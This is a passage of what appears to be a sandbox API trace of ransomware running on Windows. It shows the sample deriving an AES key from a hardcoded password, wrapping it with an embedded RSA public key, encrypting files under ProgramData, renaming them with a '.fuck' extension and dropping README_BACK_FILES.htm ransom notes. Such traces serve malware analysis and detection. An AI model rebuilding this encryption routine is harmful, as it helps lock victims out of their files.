users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.029] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg", dwFileAttributes=0x2) returned 0 [0241.030] CryptAcquireContextA (in: phProv=0x2b9e06c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e06c*=0x28f6348) returned 1 [0241.032] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e070 | out: phHash=0x2b9e070) returned 1 [0241.032] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.032] CryptHashData (hHash=0x28e84f8, pbData=0x2ec968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.032] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9e05c | out: phKey=0x2b9e05c*=0x28e8638) returned 1 [0241.032] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e078, pcbBinary=0x2b9e058, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.032] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e078, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054 | out: pvStructInfo=0x2b9e04c, pcbStructInfo=0x2b9e054) returned 1 [0241.032] CryptAcquireContextA (in: phProv=0x2b9e068, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e068*=0x28f2b80) returned 1 [0241.033] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2b80, dwCertEncodingType=0x1, pInfo=0x2907568*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907598*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29075a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e060 | out: phKey=0x2b9e060*=0x28e77b8) returned 1 [0241.033] CryptEncrypt (in: hKey=0x28e77b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e050*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e050*=0x80) returned 1 [0241.033] CryptEncrypt (in: hKey=0x28e77b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f36a8*, pdwDataLen=0x2b9e064*=0x18, dwBufLen=0x80 | out: pbData=0x28f36a8*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0241.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f36a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.033] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0241.033] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0241.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0241.034] CloseHandle (hObject=0xffffffff) returned 1 [0241.034] CloseHandle (hObject=0xffffffff) returned 1 [0241.034] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), bFailIfExists=0) returned 0 [0241.034] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", dwFileAttributes=0x0) returned 0 [0241.035] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.gsg" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.gsg")) returned 0 [0241.035] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"), lpNewFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.fuck" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag.fuck")) returned 0 [0241.035] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0241.035] CryptDestroyKey (hKey=0x28e8638) returned 1 [0241.035] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.036] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0241.036] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0241.036] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\readme_back_files.htm")) returned 0xffffffff [0241.036] AreFileApisANSI () returned 1 [0241.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0241.036] CreateFileW (lpFileName="C:\\\\Users\\All Users\\regid.1991-06.com.microsoft\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.036] GetLastError () returned 0x5 [0241.036] GetLastError () returned 0x5 [0241.037] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.037] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\SoftwareDistribution\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0241.038] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.038] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0241.038] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0241.038] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\SoftwareDistribution\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\softwaredistribution\\readme_back_files.htm")) returned 0xffffffff [0241.039] AreFileApisANSI () returned 1 [0241.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd0b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0241.039] CreateFileW (lpFileName="C:\\\\Users\\All Users\\SoftwareDistribution\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\softwaredistribution\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.039] GetLastError () returned 0x5 [0241.039] GetLastError () returned 0x5 [0241.039] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.039] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Start Menu\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0241.039] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Start Menu\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\start menu\\readme_back_files.htm")) returned 0xffffffff [0241.040] AreFileApisANSI () returned 1 [0241.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0241.040] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Start Menu\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\start menu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.040] GetLastError () returned 0x5 [0241.040] GetLastError () returned 0x5 [0241.040] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.040] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Templates\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0xffffffff [0241.041] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Templates\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\templates\\readme_back_files.htm")) returned 0xffffffff [0241.041] AreFileApisANSI () returned 1 [0241.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd070, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0241.041] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Templates\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\templates\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.041] GetLastError () returned 0x5 [0241.042] GetLastError () returned 0x5 [0241.042] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.042] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\USOPrivate\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0241.042] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.042] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.042] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.042] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0241.042] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.042] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.042] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.042] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.042] GetLastError () returned 0x5 [0241.042] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml")) returned 0x20 [0241.043] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", dwFileAttributes=0x80) returned 0 [0241.043] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.043] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.044] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg", dwFileAttributes=0x2) returned 1 [0241.045] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.047] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.047] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.047] CryptHashData (hHash=0x28e8578, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.047] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.047] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.047] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.047] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3268) returned 1 [0241.048] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3268, dwCertEncodingType=0x1, pInfo=0x2907978*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29079a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29079b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e81b8) returned 1 [0241.048] CryptEncrypt (in: hKey=0x28e81b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.048] CryptEncrypt (in: hKey=0x28e81b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f32f0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f32f0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.048] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f32f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f32f0*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.049] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.049] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.049] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9dcd8*=0x10, lpOverlapped=0x0) returned 1 [0241.049] CloseHandle (hObject=0xffffffff) returned 1 [0241.049] CloseHandle (hObject=0x5d10) returned 1 [0241.050] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), bFailIfExists=0) returned 0 [0241.058] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", dwFileAttributes=0x0) returned 0 [0241.058] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.gsg")) returned 1 [0241.059] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), lpNewFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.fuck" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.fuck")) returned 0 [0241.060] CryptDestroyHash (hHash=0x28e8578) returned 1 [0241.060] CryptDestroyKey (hKey=0x28e7978) returned 1 [0241.060] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.060] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0241.060] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0241.060] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\UpdateStore\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\readme_back_files.htm")) returned 0x20 [0241.060] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0241.060] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0241.061] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOPrivate\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\usoprivate\\readme_back_files.htm")) returned 0x20 [0241.061] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0241.061] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\USOShared\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0241.061] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.061] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0241.061] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0241.061] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.061] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.061] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0241.061] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0241.061] GetLastError () returned 0x12 [0241.062] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl")) returned 0x2020 [0241.062] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl", dwFileAttributes=0x80) returned 0 [0241.062] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.063] CreateFileA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg" (normalized: "c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.001.etl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0241.063] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl.gsg", dwFileAttributes=0x2) returned 1 [0241.064] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0241.066] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0241.066] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0241.066] CryptHashData (hHash=0x28e8578, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0241.066] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7978) returned 1 [0241.066] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0241.066] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0241.066] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f3bf8) returned 1 [0241.067] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3bf8, dwCertEncodingType=0x1, pInfo=0x2907708*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907738*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907740*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e8038) returned 1 [0241.067] CryptEncrypt (in: hKey=0x28e8038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0241.067] CryptEncrypt (in: hKey=0x28e8038, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3048*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f3048*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0241.067] WriteFile (in: hFile=0x5d10, lpBuffer=0x28f3048*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x28f3048*, lpNumberOfBytesWritten=0x2b9dcd8*=0x80, lpOverlapped=0x0) returned 1 [0241.068] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0241.068] CryptEncrypt (in: hKey=0x28e7978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0241.068] WriteFile (in: hFile=0x5d10, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, 